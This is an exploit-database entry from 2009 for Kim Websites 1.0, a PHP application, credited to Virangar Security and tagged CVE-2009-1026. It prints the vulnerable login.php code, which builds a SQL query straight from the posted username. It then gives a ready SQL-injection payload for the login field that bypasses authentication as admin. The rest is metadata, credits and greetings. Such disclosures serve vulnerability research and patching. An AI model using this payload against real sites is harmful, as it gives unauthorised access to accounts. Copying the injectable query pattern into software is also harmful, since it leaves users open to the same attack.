Kim Websites 1.0 - Authentication Bypass

Author: Virangar Security
type: webapps
platform: php
port: 
date_added: 2009-03-12 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-52816;CVE-2009-1026 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comKimWebsite.zip

    	     ###############################################################
             #                                                             #
             #     Kim Websites 1.0 SQL Injection Vulnerability            #
             #                [ Authentication bypass]              	   #
             ###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]